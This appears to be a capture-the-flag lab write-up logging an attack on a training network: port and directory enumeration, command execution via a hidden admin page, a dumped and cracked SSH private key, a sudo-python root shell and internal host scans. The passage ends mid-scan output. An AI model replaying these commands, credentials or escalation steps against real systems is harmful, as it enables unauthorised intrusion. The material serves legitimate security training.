# **TABLE OF CONTENTS:**

[toc]

---

# Flags (summary)

| id | Flag | host | location | date |
|---|---|---|---|---|
| 1 | FLAG{C3sTQu01UnU53r4G3nT?} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/robots.txt | 27/05/2024 |
| 2 | FLAG{G0bu5T3r1s4G0oD1d3A} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/flag/flag.txt | 27/05/2024 |
| 3 | FLAG{L0uRd3 M3sUr3} | 192.168.0.2 (infra-05.ipssi.cloud) | `curl http://infra-05.ipssi.cloud/newsletter/admin.php -A "TropSmartUserAgentAdminHeHeHe"` | 27/05/2024 |
| 4 | FLAG{F4c1l3ATr0uv3r} | 192.168.0.2 (infra-05.ipssi.cloud) | http://infra-05.ipssi.cloud/newsletter/truc.db | 27/05/2024 |
| 5 | FLAG{U53rR3b0Nd} | 192.168.0.2 (infra-05.ipssi.cloud) | `rebond@NewsLetter:~$ cat /home/rebond/flag.txt` | 27/05/2024 - 15h06 |
| 6 | FLAG{M1r01RM1r01R} | 192.168.0.200 | http://localhost:9999/mirror | 27/05/2024 - 17h40 |
| 7 | FLAG{P4t1C13Nc31SEv3R1tH1nG} | 192.168.0.101 | `C:\Users\tomega\Desktop\Enquete.txt` | 28/05/2024 |
| 8 | FLAG{H1dD3nF1l3Sr34Lly?} | 192.168.0.101 | `C:\Users\Public\Public Bubbles\.hidden.txt` | 28/05/2024 |
| 9 | FLAG{M0i4u5SiJ4d0R3L3sBuLl35} | 192.168.0.101 | `C:\Users\Administrator\Desktop\flag.txt` | 28/05/2024 |
| 10 | FLAG{S0fCk1nEz??????} | 192.168.0.100 | `C:\Users\Administrator\Desktop\flag.txt` | 28/05/2024 |
| 11 | FLAG{8uBb1es3v3rywh3re} | 192.168.0.123 | nmap of IP 192.168.0.123 | 29/05/2024 |
| 12 | FLAG{0hMyLF1!!} | 192.168.0.123 | 127.0.0.1:8080/config.php | 29/05/2024 |
| 13 | FLAG{4h...C0mm3nts...} | 192.168.0.123 | comment in the source code of :8080/index.php | 29/05/2024 |
| 14 | FLAG{r3gizi} | 192.168.0.100 | | 29/05/2024 |
| 15 | FLAG{7h4tW4s34syr1ght?} | 192.168.0.123 | `/home/john/.flag` | 29/05/2024 |
| 16 | FLAG{s3ct4ryBub113s} | 192.168.0.123 | `http://localhost:8080/admin.php` | 29/05/2024 |

---

# Wordlist built from the data found

```
$ cat wordlist.txt
JADORELESBULLES
TropSmartUserAgentAdminHeHeHe
oui.truc@gmail.com
oui
truc
oui.truc
mirroir
administrator
Administrator
bubble.dev
bubble
dev
tomega
omega
iamtheomega
localadm
424368059590d35e0152cedf07afd96376548a52bd714eebaa089f452fb5dd76
secret.key
flag
uoddsfhhbhkdhhh8
john
toto
```

---

# Notes

## [Info] Port enumeration

```bash
nmap infra-05.ipssi.cloud -p 1-65000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 11:53 CEST
Nmap scan report for infra-05.ipssi.cloud (51.255.94.193)
Host is up (0.054s latency).
rDNS record for 51.255.94.193: ns3050781.ip-51-255-94.eu
Not shown: 64993 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
80/tcp    open     http
111/tcp   open     rpcbind
3128/tcp  open     squid-http
8006/tcp  open     wpl-analytics
64220/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 69.19 seconds
```

---

## [Info] Service banners

```
$ nmap -sV --script=banner infra-05.ipssi.cloud -p 1-65000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 12:08 CEST
Nmap scan report for infra-05.ipssi.cloud (51.255.94.193)
Host is up (0.053s latency).
rDNS record for 51.255.94.193: ns3050781.ip-51-255-94.eu
Not shown: 64993 closed tcp ports (reset)
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.7
25/tcp    filtered smtp
80/tcp    open     http           Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
111/tcp   open     rpcbind        2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
3128/tcp  open     http           Proxmox Virtual Environment REST API 3.0
|_http-server-header: pve-api-daemon/3.0
8006/tcp  open     wpl-analytics?
| fingerprint-strings:
|   HTTPOptions:
|     HTTP/1.0 501 method 'OPTIONS' not available
|     Cache-Control: max-age=0
|     Connection: close
|     Date: Mon, 27 May 2024 10:12:23 GMT
|     Pragma: no-cache
|     Server: pve-api-daemon/3.0
|     Expires: Mon, 27 May 2024 10:12:23 GMT
|   Help:
|     HTTP/1.0 400 bad request
|     Cache-Control: max-age=0
|     Connection: close
|     Date: Mon, 27 May 2024 10:12:38 GMT
|     Pragma: no-cache
|     Server: pve-api-daemon/3.0
|     Expires: Mon, 27 May 2024 10:12:38 GMT
|   Kerberos, TerminalServerCookie:
|     HTTP/1.0 400 bad request
|     Cache-Control: max-age=0
|     Connection: close
|     Date: Mon, 27 May 2024 10:12:39 GMT
|     Pragma: no-cache
|     Server: pve-api-daemon/3.0
|     Expires: Mon, 27 May 2024 10:12:39 GMT
|   LDAPSearchReq, LPDString:
|     HTTP/1.0 400 bad request
|     Cache-Control: max-age=0
|     Connection: close
|     Date: Mon, 27 May 2024 10:12:49 GMT
|     Pragma: no-cache
|     Server: pve-api-daemon/3.0
|     Expires: Mon, 27 May 2024 10:12:49 GMT
|   RTSPRequest:
|     HTTP/1.0 400 bad request
|     Cache-Control: max-age=0
|     Connection: close
|     Date: Mon, 27 May 2024 10:12:23 GMT
|     Pragma: no-cache
|     Server: pve-api-daemon/3.0
|_    Expires: Mon, 27 May 2024 10:12:23 GMT
64220/tcp open     ssh            OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8006-TCP:V=7.94SVN%I=7%D=5/27%Time=66545BDE%P=x86_64-pc-linux-gnu%r
SF:(HTTPOptions,D7,"HTTP/1\.0\x20501\x20method\x20'OPTIONS'\x20not\x20avai
SF:lable\r\nCache-Control:\x20max-age=0\r\nConnection:\x20close\r\nDate:\x
SF:20Mon,\x2027\x20May\x202024\x2010:12:23\x20GMT\r\nPragma:\x20no-cache\r
SF:\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\x20Mon,\x2027\x20May\x2020
SF:24\x2010:12:23\x20GMT\r\n\r\n")%r(RTSPRequest,C4,"HTTP/1\.0\x20400\x20b
SF:ad\x20request\r\nCache-Control:\x20max-age=0\r\nConnection:\x20close\r\
SF:nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:23\x20GMT\r\nPragma:\x20no
SF:-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\x20Mon,\x2027\x20M
SF:ay\x202024\x2010:12:23\x20GMT\r\n\r\n")%r(Help,C4,"HTTP/1\.0\x20400\x20
SF:bad\x20request\r\nCache-Control:\x20max-age=0\r\nConnection:\x20close\r
SF:\nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:38\x20GMT\r\nPragma:\x20n
SF:o-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\x20Mon,\x2027\x20
SF:May\x202024\x2010:12:38\x20GMT\r\n\r\n")%r(TerminalServerCookie,C4,"HTT
SF:P/1\.0\x20400\x20bad\x20request\r\nCache-Control:\x20max-age=0\r\nConne
SF:ction:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:39\x20GM
SF:T\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpires:\
SF:x20Mon,\x2027\x20May\x202024\x2010:12:39\x20GMT\r\n\r\n")%r(Kerberos,C4
SF:,"HTTP/1\.0\x20400\x20bad\x20request\r\nCache-Control:\x20max-age=0\r\n
SF:Connection:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202024\x2010:12:39\
SF:x20GMT\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-daemon/3\.0\r\nExpi
SF:res:\x20Mon,\x2027\x20May\x202024\x2010:12:39\x20GMT\r\n\r\n")%r(LPDStr
SF:ing,C4,"HTTP/1\.0\x20400\x20bad\x20request\r\nCache-Control:\x20max-age
SF:=0\r\nConnection:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202024\x2010:
SF:12:49\x20GMT\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-daemon/3\.0\r
SF:\nExpires:\x20Mon,\x2027\x20May\x202024\x2010:12:49\x20GMT\r\n\r\n")%r(
SF:LDAPSearchReq,C4,"HTTP/1\.0\x20400\x20bad\x20request\r\nCache-Control:\
SF:x20max-age=0\r\nConnection:\x20close\r\nDate:\x20Mon,\x2027\x20May\x202
SF:024\x2010:12:49\x20GMT\r\nPragma:\x20no-cache\r\nServer:\x20pve-api-dae
SF:mon/3\.0\r\nExpires:\x20Mon,\x2027\x20May\x202024\x2010:12:49\x20GMT\r\
SF:n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.53 seconds
```

---

## [Info] Port summary

| port | service | status | banner |
|---|---|---|---|
| 22 | ssh | open | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.7 |
| 25 | smtp | filtered | - |
| 80 | http | open | Apache httpd 2.4.52 ((Ubuntu)) |
| 111 | rpcbind ? | open | rpcinfo: 100000 2,3,4 111/tcp rpcbind |
| 3128 | http | open | Proxmox Virtual Environment REST API 3.0 |

---

## [Info] Gobuster (infra-05.ipssi.cloud)

```bash
$ gobuster dir --url infra-05.ipssi.cloud/newsletter/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://infra-05.ipssi.cloud/newsletter/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 285]
/.hta                 (Status: 403) [Size: 285]
/.htpasswd            (Status: 403) [Size: 285]
/admin.php            (Status: 200) [Size: 417]
/assets               (Status: 301) [Size: 340] [--> http://infra-05.ipssi.cloud/newsletter/assets/]
/css                  (Status: 301) [Size: 337] [--> http://infra-05.ipssi.cloud/newsletter/css/]
/flag                 (Status: 301) [Size: 338] [--> http://infra-05.ipssi.cloud/newsletter/flag/]
/index.php            (Status: 200) [Size: 772]
/js                   (Status: 301) [Size: 336] [--> http://infra-05.ipssi.cloud/newsletter/js/]
/n                    (Status: 200) [Size: 658]
/robots.txt           (Status: 200) [Size: 133]
Progress: 4727 / 4727 (100.00%)
===============================================================
Finished
===============================================================
```

---

## [Flag] Robots.txt `FLAG{C3sTQu01UnU53r4G3nT?}`

> http://infra-05.ipssi.cloud/newsletter/robots.txt

```bash
$ curl http://infra-05.ipssi.cloud/newsletter/robots.txt
User-Agent: TropSmartUserAgentAdminHeHeHe
Allow: /admin.php

User-Agent: *
Disallow: /admin.php
Disallow: FLAG{C3sTQu01UnU53r4G3nT?}
```

---

## [Flag] flag.txt `FLAG{G0bu5T3r1s4G0oD1d3A}`

> http://infra-05.ipssi.cloud/newsletter/flag/flag.txt

```bash
curl http://infra-05.ipssi.cloud/newsletter/flag/flag.txt
FLAG{G0bu5T3r1s4G0oD1d3A}
```

---

## [Flag] admin.php `FLAG{L0uRd3 M3sUr3}`

```bash
curl http://infra-05.ipssi.cloud/newsletter/admin.php -A "TropSmartUserAgentAdminHeHeHe"
```

```html
<html>
<head>
<title>BubbleDev - NewsLetter !</title>
<link rel="stylesheet" href="css/style.css"/>
<script src="js/particles.min.js"></script>
<script>particlesJS.load('particles-js', 'assets/particles.json', function() { });</script>
<body>
</head>
<body>
<div id="particles-js"></div>
<div id="h" style="margin-top: 0; height: 100%;">
<div id="b">BubbleDev !</div>
<div id="d">J'suis vraiment beaucoup trop smart avec cette mesure de securite !<!-- FLAG{L0uRd3 M3sUr3} --><br><br>Par contre faut pas déconner, on va pas laisser n'importe quelle commande, il va falloir se contenter de ça</div>
<pre id="m" style="width: 80%; background: #444; overflow-y: scroll; height: 200px; padding: 3%; margin-left: 6%; border: 2px solid black;">
Nothing to display yet...
</pre>
<div id="bs">
<button onclick="w(this);">id -a</button>
<button onclick="w(this);">ping -c4 1.1.1.1</button>
<button onclick="w(this);">ss -lntuop</button>
<button onclick="w(this);">ps -ef</button>
</div>
</div>
</body>
<script>
function w(e) {
  var formData = new FormData();
  formData.append('cmd', e.innerText);
  fetch("cmd.php", { method: "POST", body: formData })
    .then(response => {
      if(!response.ok) {
        throw new Error("Fetch API failed.");
      } else {
        return response.text();
      }
    })
    .then(data => {
      document.getElementById("m").innerText = data;
      console.log(data);
    });
}
</script>
</html>
```

---

## [Info] /n

```bash
$ curl http://infra-05.ipssi.cloud/newsletter/n
POST /newsletter/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/newsletter/
Cookie: PHPSESSID=elbbvah7qi6oo81vptni33aja2; JSESSID=294de3557d9d00b3d2d8a1e6aab028cf
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

t=oui.truc@gmail.com
```

---

## [Info] Executing commands via admin.php

### Burpsuite (GUI)

![burpsuite proxy](https://hackmd.io/_uploads/rJBcqkfEC.png)

![launching the modified command](https://hackmd.io/_uploads/rkrFiJM4C.png)

```
total 124
drwxr-xr-x 6 www-data root      4096 May 27 11:06 .
drwxr-xr-x 3 www-data www-data  4096 May 26 08:47 ..
-rw-r--r-- 1 www-data www-data  1630 May 22 21:57 admin.php
drwxr-xr-x 2 www-data www-data  4096 May 22 11:32 assets
-rw-r--r-- 1 www-data www-data    58 May 22 21:47 cmd.php
drwxr-xr-x 2 www-data www-data  4096 May 22 21:53 css
drwxr-xr-x 2 www-data www-data  4096 May 22 21:54 flag
-rw-r--r-- 1 www-data www-data  1301 May 22 21:05 index.php
drwxr-xr-x 2 www-data www-data  4096 May 22 11:32 js
-rw-r--r-- 1 www-data www-data   658 May 22 21:04 n
-rw-r--r-- 1 www-data www-data   133 May 22 21:55 robots.txt
-rw-r--r-- 1 www-data www-data 77824 May 27 11:06 truc.db
```

---

### Via Repeater

![image](https://hackmd.io/_uploads/rymDhkzNR.png)

Action - send to repeater

![image](https://hackmd.io/_uploads/SkKQ6JG4R.png)

---

## [Flag] truc.db `FLAG{F4c1l3ATr0uv3r}`

![image](https://hackmd.io/_uploads/S166pyf4R.png)

```bash
$ wget http://infra-05.ipssi.cloud/newsletter/truc.db
--2024-05-27 13:24:12--  http://infra-05.ipssi.cloud/newsletter/truc.db
Resolving infra-05.ipssi.cloud (infra-05.ipssi.cloud)... 51.255.94.193
Connecting to infra-05.ipssi.cloud (infra-05.ipssi.cloud)|51.255.94.193|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 77824 (76K)
Saving to: ‘truc.db’

truc.db              100%[============================>]  76.00K  --.-KB/s    in 0.1s

2024-05-27 13:24:13 (671 KB/s) - ‘truc.db’ saved [77824/77824]
```

```bash
$ sqlite3
SQLite version 3.45.3 2024-04-15 13:34:05
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> .open "truc.db"
sqlite> .databases
main: /home/khey/truc.db r/w
sqlite> .tables
mails    secrets
sqlite> SELECT * FROM secrets;
FLAG{F4c1l3ATr0uv3r}
sqlite>
```

---

## [Info] SSH key of user `rebond`

![image](https://hackmd.io/_uploads/rJBKRgMVC.png)

![image](https://hackmd.io/_uploads/r1-jCgf4C.png)

![image](https://hackmd.io/_uploads/rkIF5lMNR.png)

```bash
cat <<EOF > rebond-privkey
-----BEGIN OPENSSH PRIVATE KEY-----
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
IuKKcQ==
-----END OPENSSH PRIVATE KEY-----
EOF

chmod 600 rebond-privkey
ssh2john rebond-privkey > rebond-privkey-hash.txt
cat rebond-privkey-hash.txt
rebond-privkey:$sshng$6$16$062a3fc174c2ce3b91a60fdb08e723a4$1894$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$16$486

john --wordlist=frenchpasswords20000.txt rebond-privkey-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
oui              (idrsa)
1g 0:00:10:37 DONE (2024-05-27 08:59) 0.001569g/s 9.465p/s 9.465c/s 9.465C/s seven7..father
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ssh -i rebond-privkey rebond@infra-05.ipssi.cloud
Enter passphrase for key 'rebond-privkey': oui
Welcome to Ubuntu 22.04 LTS (GNU/Linux 6.8.4-3-pve x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Sat May 25 08:21:35 2024 from 192.168.0.1
rebond@NewsLetter:~$
Connection to infra-05.ipssi.cloud closed by remote host.
Connection to infra-05.ipssi.cloud closed.
```

---

## [Flag] (as rebond) /home/rebond/flag.txt

> **15h06** `FLAG{U53rR3b0Nd}`

![image](https://hackmd.io/_uploads/HyPx-eGE0.png)

```
rebond@NewsLetter:~$ cat flag.txt
FLAG{U53rR3b0Nd}
```

---

## [Info] Getting root

From rebond:

```bash
rebond@NewsLetter:~$ sudo /usr/bin/python3 -c 'import os; os.system("/bin/bash")'
root@NewsLetter:/home/rebond#
```

Another way:

```bash
sudo python3 -c 'import os; os.system("su root")'
```

---

## [Info] Lateral movement: host enumeration

```bash
root@NewsLetter:/home/rebond# nmap -sn 192.168.0.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:42 UTC
Nmap scan report for 192.168.0.1
Host is up (0.00010s latency).
MAC Address: BA:9B:50:98:D1:8A (Unknown)
Nmap scan report for 192.168.0.80
Host is up (0.000054s latency).
MAC Address: BC:24:11:1A:E1:45 (Unknown)
Nmap scan report for 192.168.0.81
Host is up (0.000035s latency).
MAC Address: BC:24:11:E7:C7:CF (Unknown)
Nmap scan report for 192.168.0.100
Host is up (0.00011s latency).
MAC Address: BC:24:11:99:91:F7 (Unknown)
Nmap scan report for 192.168.0.101
Host is up (0.00017s latency).
MAC Address: BC:24:11:4F:8B:17 (Unknown)
Nmap scan report for 192.168.0.200
Host is up (0.000090s latency).
MAC Address: BC:24:11:07:76:DF (Unknown)
Nmap scan report for NewsLetter.local (192.168.0.2)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.30 seconds
```

| host | hostname |
|---|---|
| 192.168.0.1 | gateway |
| 192.168.0.2 | NewsLetter |
| 192.168.0.80 | Jenkins |
| 192.168.0.81 | Gitea |
| 192.168.0.100 | Windows Server |
| 192.168.0.101 | Windows Client |
| 192.168.0.200 | Les maths c'est nul |

---

## [Info] nmap 192.168.0.80

```bash
root@NewsLetter:/home/rebond# nmap -sV 192.168.0.80 -p 1-65000
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 13:47 UTC
Nmap scan report for 192.168.0.80
Host is up (0.0000090s latency).
Not shown: 64998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Jetty 10.0.20
MAC Address: BC:24:11:1A:E1:45 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
```

| port | protocol | service |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) |
| 8080 | http | Jetty 10.0.20 |

---

## [Info] nmap 192.168.0.81

```bash
root@NewsLetter:/home/rebond# nmap -sV 192.168.0.81 -p 1-65000
Starting Nmap 7.80 ( https://nmap.org ) at 2024-05-27 14:01 UTC
Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 14:03 (0:00:46 remaining)
Nmap scan report for 192.168.0.81
Host is up (0.0000090s latency).
Not shown: 64998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
3000/tcp open  ppp?
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.80%I=7%D=5/27%Time=66549251%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,1000,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:
SF:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nConte
SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea=
SF:08a5c5196903186e;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie
SF::\x20_csrf=evIy1t3zoIUSe1yD4NGsT2Jq7586MTcxNjgxODUxMzY3NzI0MDE2Nw;\x20P
SF:ath=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Option
SF:s:\x20SAMEORIGIN\r\nDate:\x20Mon,\x2027\x20May\x202024\x2014:01:53\x20G
SF:MT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-
SF:auto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device
SF:-width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20c
SF:up\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:app
SF:lication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYS
SF:IsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfd
SF:XJsIjoiaHR0cDovLzE5Mi4xNjguMC44MTozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRw
SF:Oi8vMTkyLjE2OC4wLjgxOjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWF
SF:nZS9wbmciLCJzaXp")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(HTTPOptions,1D7,"HTTP/1\.0\x20405\x20Metho
SF:d\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20HE
SF:AD\r\nAllow:\x20GET\r\nAllow:\x20HEAD\r\nAllow:\x20HEAD\r\nAllow:\x20GE
SF:T\r\nCache-Control:\x20max-age=0,\x20private,\x20must-revalidate,\x20no
SF:-transform\r\nSet-Cookie:\x20i_like_gitea=b46ae29f04d7958e;\x20Path=/;\
SF:x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:\x20_csrf=apn2X3-a9aEDF3EHdQ
SF:dqP2Kq7u06MTcxNjgxODUxODY5MzQwMjI3OA;\x20Path=/;\x20Max-Age=86400;\x20H
SF:ttpOnly;\x20SameSite=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20
SF:Mon,\x2027\x20May\x202024\x2014:01:58\x20GMT\r\nContent-Length:\x200\r\
